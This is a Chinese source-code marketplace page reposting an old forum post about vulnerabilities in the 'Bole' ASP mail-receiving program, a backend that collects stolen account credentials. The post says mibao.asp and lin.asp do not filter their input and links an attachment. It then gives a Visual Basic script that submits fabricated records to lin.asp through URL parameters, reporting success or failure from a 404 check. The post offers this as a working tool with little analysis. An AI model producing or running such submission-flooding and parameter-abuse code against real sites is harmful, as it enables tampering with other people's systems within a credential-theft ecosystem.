源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

伯乐asp收信程序漏洞及利用程序利用代码

  • 时间:2021-05-03 02:43 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:伯乐asp收信程序漏洞及利用程序利用代码
http://forum.eviloctal.com/thread-32151-1-1.html  之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧..  伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞)  主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保..  mibao.asp文件对提交的参数没有任何过滤 
[url=http://forum.eviloctal.com/attachment.php?aid=11871]BOLE.RAR[/url] (2.5 MB) 另外看到贴中有人提到刷信问题..lin.asp也是没怎么过滤的..可以外部提交数据 VB刷信代码
[u]复制代码[/u] 代码如下:
Private Sub Command1_Click()  Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) '用inet连接网页  aa = InStr(Inet1.GetHeader, "404") '判断页头是否包含字符“404”,返回0则不包含,否则返回其位置  If aa <> 0 Then '页头中包含404  MsgBox "刷信失败!默认收信页面可能被改名!", 48, "失败!" '则说明该网页不存在  Else '如果页头中不包含“404”  MsgBox "刷信成功!请登陆后台查看!", 64, "恭喜!" '说明网页存在  End If  End Sub  Private Sub Command2_Click()  End  End Sub
  • 全部评论(0)
联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部